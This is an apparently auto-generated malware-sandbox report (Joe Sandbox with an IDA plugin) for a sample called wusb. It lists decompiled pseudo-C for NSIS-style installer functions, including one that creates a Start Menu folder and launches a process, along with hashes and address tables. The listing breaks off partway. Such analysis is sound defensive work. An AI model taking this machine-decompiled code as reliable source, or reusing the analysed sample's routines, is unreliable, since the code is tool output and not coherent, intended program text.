                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                                        • Instruction ID: b613885e7b2bd37cd291f1056477dd360c9db9b8968a6fc02a79c1078c08bd5c
                                                        • Opcode Fuzzy Hash: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                                        • Instruction Fuzzy Hash: 51B09235280600ABDE214B40DE49F467A62A7B4701F008178B240640B0CAB200A1DB19
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004032F5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E004032F5(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                        0x00403303
                                                        0x00403309

                                                        APIs
                                                        • SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403303
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: FilePointer
                                                        • String ID:
                                                        • API String ID: 973152223-0
                                                        • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                        • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                        • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                        • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00404203 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00404203(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x4236e4, _a4); // executed
				return _t2;
			}




                                                        0x0040420d
                                                        0x00404213

                                                        APIs
                                                        • KiUserCallbackDispatcher.NTDLL(?,00403FDA), ref: 0040420D
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: CallbackDispatcherUser
                                                        • String ID:
                                                        • API String ID: 2492992576-0
                                                        • Opcode ID: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
                                                        • Instruction ID: cd7a90ca9096364f54c072f0977fd0b21683179c1f8a6313e809ce6865a57a73
                                                        • Opcode Fuzzy Hash: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
                                                        • Instruction Fuzzy Hash: AFA01231100400ABCE124F50DF08C09BA31B7B43017104439A1400003086320420EB08
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00401F00 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 78%
                                                        			E00401F00() {
				void* _t9;
				intOrPtr _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402C37(_t15);
				E004052B0(0xffffffeb, _t7); // executed
				_t9 = E00405831(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x20)) != _t15) {
						_t13 = E004066D7(_t17, _t20);
						if( *((intOrPtr*)(_t22 - 0x24)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E00406193( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}









                                                        0x00401f06
                                                        0x00401f0b
                                                        0x00401f11
                                                        0x00401f16
                                                        0x00401f1a
                                                        0x00402885
                                                        0x00401f20
                                                        0x00401f23
                                                        0x00401f26
                                                        0x00401f2e
                                                        0x00401f3d
                                                        0x00401f3f
                                                        0x00401f3f
                                                        0x00401f30
                                                        0x00401f34
                                                        0x00401f34
                                                        0x00401f2e
                                                        0x00401f46
                                                        0x00401f47
                                                        0x00401f47
                                                        0x00402ac2
                                                        0x00402ace

                                                        APIs
                                                          • Part of subcall function 004052B0: lstrlenW.KERNEL32(Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                                          • Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,00410EA0,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                                          • Part of subcall function 004052B0: lstrcatW.KERNEL32(Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00403233), ref: 0040530B
                                                          • Part of subcall function 004052B0: SetWindowTextW.USER32(Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade), ref: 0040531D
                                                          • Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                                          • Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                                          • Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                                          • Part of subcall function 00405831: CreateProcessW.KERNELBASE ref: 0040585A
                                                          • Part of subcall function 00405831: CloseHandle.KERNEL32(?), ref: 00405867
                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F47
                                                          • Part of subcall function 004066D7: WaitForSingleObject.KERNEL32(?,00000064), ref: 004066E8
                                                          • Part of subcall function 004066D7: GetExitCodeProcess.KERNEL32 ref: 0040670A
                                                          • Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                        • String ID:
                                                        • API String ID: 2972824698-0
                                                        • Opcode ID: c16697fcb2bd3d13e2a0f714b19764dceb2bd972e2531188fe870dcb6e060f9f
                                                        • Instruction ID: bab1dc3541612b80991091494b36371daed99366b6aa6fafa292830653d85492
                                                        • Opcode Fuzzy Hash: c16697fcb2bd3d13e2a0f714b19764dceb2bd972e2531188fe870dcb6e060f9f
                                                        • Instruction Fuzzy Hash: 95F09032905121EBCB21FBA18D8899E72A49F01328B2505BBF501F21D1C77D0E518AAE
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E004014D7(intOrPtr __edx) {
				long _t3;
				void* _t7;
				intOrPtr _t10;
				void* _t13;

				_t10 = __edx;
				_t3 = E00402C15(_t7);
				 *((intOrPtr*)(_t13 - 0x4c)) = _t10;
				if(_t3 <= 1) {
					_t3 = 1;
				}
				Sleep(_t3); // executed
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t13 - 4));
				return 0;
			}







                                                        0x004014d7
                                                        0x004014d8
                                                        0x004014e1
                                                        0x004014e4
                                                        0x004014e8
                                                        0x004014e8
                                                        0x004014ea
                                                        0x00402ac2
                                                        0x00402ace

                                                        APIs
                                                        • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID:
                                                        • API String ID: 3472027048-0
                                                        • Opcode ID: 631673ee5c1514c42db72881fe5300a3541e6f73d544da548d52187aa9158ecf
                                                        • Instruction ID: a3662d66bb57f0e4aff7a204df28f74e708ba92ca424d5dc4d08b62f06a02aad
                                                        • Opcode Fuzzy Hash: 631673ee5c1514c42db72881fe5300a3541e6f73d544da548d52187aa9158ecf
                                                        • Instruction Fuzzy Hash: F6D0A773F141008FD720EBB8BE8945E73F8E7803193208837E102F11D2E578C8528A6D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 1000121B Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E1000121B() {
				void* _t3;

				_t3 = GlobalAlloc(0x40,  *0x1000406c +  *0x1000406c); // executed
				return _t3;
			}




                                                        0x10001225
                                                        0x1000122b

                                                        APIs
                                                        • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.677589038.0000000010001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000002.00000002.677505776.0000000010000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.677602813.0000000010003000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.677619149.0000000010005000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_10000000_wusb.jbxd
                                                        Similarity
                                                        • API ID: AllocGlobal
                                                        • String ID:
                                                        • API String ID: 3761449716-0
                                                        • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                        • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                        • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                        • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 00404C2C Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 96%
                                                        			E00404C2C(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed char* _v28;
				long _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				signed char* _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t192;
				intOrPtr _t195;
				long _t201;
				signed int _t205;
				signed int _t216;
				void* _t219;
				void* _t220;
				int _t226;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t239;
				signed int _t241;
				signed char _t242;
				signed char _t248;
				void* _t252;
				void* _t254;
				signed char* _t270;
				signed char _t271;
				long _t276;
				int _t282;
				signed int _t283;
				long _t284;
				signed int _t287;
				signed int _t294;
				signed char* _t302;
				struct HWND__* _t306;
				int _t307;
				signed int* _t308;
				int _t309;
				long _t310;
				signed int _t311;
				void* _t313;
				long _t314;
				int _t315;
				signed int _t316;
				void* _t318;

				_t306 = _a4;
				_v12 = GetDlgItem(_t306, 0x3f9);
				_v8 = GetDlgItem(_t306, 0x408);
				_t318 = SendMessageW;
				_v20 =  *0x42a248;
				_t282 = 0;
				_v24 =  *0x42a214 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t285 = _a16;
					} else {
						_a12 = _t282;
						_t285 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t285;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
							if(( *0x42a21d & 0x00000002) != 0) {
								L41:
								if(_v16 != _t282) {
									_t231 = _v16;
									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, _t282,  *(_t231 + 0x5c));
									}
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe39) {
										_t285 = _v20;
										_t233 =  *(_t232 + 0x5c);
										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) & 0xffffffdf;
										} else {
											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t285 = 0 | _a8 != 0x00000413;
								_t239 = E00404B7A(_v8, _a8 != 0x413);
								_t311 = _t239;
								if(_t311 >= _t282) {
									_t88 = _v20 + 8; // 0x8
									_t285 = _t239 * 0x818 + _t88;
									_t241 =  *_t285;
									if((_t241 & 0x00000010) == 0) {
										if((_t241 & 0x00000040) == 0) {
											_t242 = _t241 ^ 0x00000001;
										} else {
											_t248 = _t241 ^ 0x00000080;
											if(_t248 >= 0) {
												_t242 = _t248 & 0x000000fe;
											} else {
												_t242 = _t248 | 0x00000001;
											}
										}
										 *_t285 = _t242;
										E0040117D(_t311);
										_a12 = _t311 + 1;
										_a16 =  !( *0x42a21c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t285 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, _t282, _t282);
							}
							if(_a8 == 0x40b) {
								_t219 =  *0x4236cc;
								if(_t219 != _t282) {
									ImageList_Destroy(_t219);
								}
								_t220 =  *0x4236e0;
								if(_t220 != _t282) {
									GlobalFree(_t220);
								}
								 *0x4236cc = _t282;
								 *0x4236e0 = _t282;
								 *0x42a280 = _t282;
							}
							if(_a8 != 0x40f) {
								L88:
								if(_a8 == 0x420 && ( *0x42a21d & 0x00000001) != 0) {
									_t307 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t307);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
								}
								goto L91;
							} else {
								E004011EF(_t285, _t282, _t282);
								_t192 = _a12;
								if(_t192 != _t282) {
									if(_t192 != 0xffffffff) {
										_t192 = _t192 - 1;
									}
									_push(_t192);
									_push(8);
									E00404BFA();
								}
								if(_a16 == _t282) {
									L75:
									E004011EF(_t285, _t282, _t282);
									_v32 =  *0x4236e0;
									_t195 =  *0x42a248;
									_v60 = 0xf030;
									_v20 = _t282;
									if( *0x42a24c <= _t282) {
										L86:
										InvalidateRect(_v8, _t282, 1);
										if( *((intOrPtr*)( *0x4291dc + 0x10)) != _t282) {
											E00404B35(0x3ff, 0xfffffffb, E00404B4D(5));
										}
										goto L88;
									}
									_t308 = _t195 + 8;
									do {
										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
										if(_t201 != _t282) {
											_t287 =  *_t308;
											_v68 = _t201;
											_v72 = 8;
											if((_t287 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t308[4]);
												_t308[0] = _t308[0] & 0x000000fe;
											}
											if((_t287 & 0x00000040) == 0) {
												_t205 = (_t287 & 0x00000001) + 1;
												if((_t287 & 0x00000010) != 0) {
													_t205 = _t205 + 3;
												}
											} else {
												_t205 = 3;
											}
											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageW(_v8, 0x113f, _t282,  &_v72);
										}
										_v20 = _v20 + 1;
										_t308 =  &(_t308[0x206]);
									} while (_v20 <  *0x42a24c);
									goto L86;
								} else {
									_t309 = E004012E2( *0x4236e0);
									E00401299(_t309);
									_t216 = 0;
									_t285 = 0;
									if(_t309 <= _t282) {
										L74:
										SendMessageW(_v12, 0x14e, _t285, _t282);
										_a16 = _t309;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
											_t285 = _t285 + 1;
										}
										_t216 = _t216 + 1;
									} while (_t216 < _t309);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L91;
						} else {
							_t226 = SendMessageW(_v12, 0x147, _t282, _t282);
							if(_t226 == 0xffffffff) {
								goto L91;
							}
							_t310 = SendMessageW(_v12, 0x150, _t226, _t282);
							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
								_t310 = 0x20;
							}
							E00401299(_t310);
							SendMessageW(_a4, 0x420, _t282, _t310);
							_a12 = _a12 | 0xffffffff;
							_a16 = _t282;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v32 = 0;
					_v16 = 2;
					 *0x42a280 = _t306;
					 *0x4236e0 = GlobalAlloc(0x40,  *0x42a24c << 2);
					_t252 = LoadBitmapW( *0x42a200, 0x6e);
					 *0x4236d4 =  *0x4236d4 | 0xffffffff;
					_t313 = _t252;
					 *0x4236dc = SetWindowLongW(_v8, 0xfffffffc, E00405224);
					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x4236cc = _t254;
					ImageList_AddMasked(_t254, _t313, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x4236cc);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t313);
					_t314 = 0;
					do {
						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
							if(_t314 != 0x20) {
								_v16 = _t282;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, _t282, E0040626E(_t282, _t314, _t318, _t282, _t260)), _t314);
						}
						_t314 = _t314 + 1;
					} while (_t314 < 0x21);
					_t315 = _a16;
					_t283 = _v16;
					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
					_push(0x15);
					E004041E1(_a4);
					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
					_push(0x16);
					E004041E1(_a4);
					_t316 = 0;
					_t284 = 0;
					if( *0x42a24c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t302 = _v20 + 8;
						_v28 = _t302;
						do {
							_t270 =  &(_t302[0x10]);
							if( *_t270 != 0) {
								_v60 = _t270;
								_t271 =  *_t302;
								_t294 = 0x20;
								_v84 = _t284;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t294;
								_v40 = _t316;
								_v68 = _t271 & _t294;
								if((_t271 & 0x00000002) == 0) {
									if((_t271 & 0x00000004) == 0) {
										 *( *0x4236e0 + _t316 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v84);
									} else {
										_t284 = SendMessageW(_v8, 0x110a, 3, _t284);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t276 = SendMessageW(_v8, 0x1132, 0,  &_v84);
									_v32 = 1;
									 *( *0x4236e0 + _t316 * 4) = _t276;
									_t284 =  *( *0x4236e0 + _t316 * 4);
								}
							}
							_t316 = _t316 + 1;
							_t302 =  &(_v28[0x818]);
							_v28 = _t302;
						} while (_t316 <  *0x42a24c);
						if(_v32 != 0) {
							L20:
							if(_v16 != 0) {
								E00404216(_v8);
								_t282 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00404216(_v12);
								L91:
								return E00404248(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}




























































                                                        0x00404c3b
                                                        0x00404c4c
                                                        0x00404c51
                                                        0x00404c59
                                                        0x00404c5f
                                                        0x00404c67
                                                        0x00404c75
                                                        0x00404c78
                                                        0x00404e99
                                                        0x00404ea0
                                                        0x00404eb4
                                                        0x00404ea2
                                                        0x00404ea4
                                                        0x00404ea7
                                                        0x00404ea8
                                                        0x00404eaf
                                                        0x00404eaf
                                                        0x00404ec0
                                                        0x00404ece
                                                        0x00404ed1
                                                        0x00404ee7
                                                        0x00404f5c
                                                        0x00404f5f
                                                        0x00404f61
                                                        0x00404f6b
                                                        0x00404f79
                                                        0x00404f79
                                                        0x00404f7b
                                                        0x00404f85
                                                        0x00404f8b
                                                        0x00404f8e
                                                        0x00404f91
                                                        0x00404fac
                                                        0x00404f93
                                                        0x00404f9d
                                                        0x00404f9d
                                                        0x00404f91
                                                        0x00404f85
                                                        0x00000000
                                                        0x00404f5f
                                                        0x00404eec
                                                        0x00404ef7
                                                        0x00404efc
                                                        0x00404f03
                                                        0x00404f08
                                                        0x00404f0c
                                                        0x00404f17
                                                        0x00404f17
                                                        0x00404f1b
                                                        0x00404f1f
                                                        0x00404f23
                                                        0x00404f36
                                                        0x00404f25
                                                        0x00404f25
                                                        0x00404f2c
                                                        0x00404f32
                                                        0x00404f2e
                                                        0x00404f2e
                                                        0x00404f2e
                                                        0x00404f2c
                                                        0x00404f3a
                                                        0x00404f3c
                                                        0x00404f4f
                                                        0x00404f52
                                                        0x00404f55
                                                        0x00404f55
                                                        0x00404f1f
                                                        0x00000000
                                                        0x00404f0c
                                                        0x00404eee
                                                        0x00404ef5
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00404faf
                                                        0x00404faf
                                                        0x00404fb6
                                                        0x00405027
                                                        0x0040502f
                                                        0x00405037
                                                        0x00405037
                                                        0x00405040
                                                        0x00405042
                                                        0x00405049
                                                        0x0040504c
                                                        0x0040504c
                                                        0x00405052
                                                        0x00405059
                                                        0x0040505c
                                                        0x0040505c
                                                        0x00405062
                                                        0x00405068
                                                        0x0040506e
                                                        0x0040506e
                                                        0x0040507b
                                                        0x004051d1
                                                        0x004051d8
                                                        0x004051f5
                                                        0x004051fb
                                                        0x0040520d
                                                        0x0040520d
                                                        0x00000000
                                                        0x00405081
                                                        0x00405083
                                                        0x00405088
                                                        0x0040508d
                                                        0x00405092
                                                        0x00405094
                                                        0x00405094
                                                        0x00405095
                                                        0x00405096
                                                        0x00405098
                                                        0x00405098
                                                        0x004050a0
                                                        0x004050e1
                                                        0x004050e3
                                                        0x004050f3
                                                        0x004050f6
                                                        0x004050fb
                                                        0x00405102
                                                        0x00405105
                                                        0x004051a7
                                                        0x004051ad
                                                        0x004051bb
                                                        0x004051cc
                                                        0x004051cc
                                                        0x00000000
                                                        0x004051bb
                                                        0x0040510b
                                                        0x0040510e
                                                        0x00405114
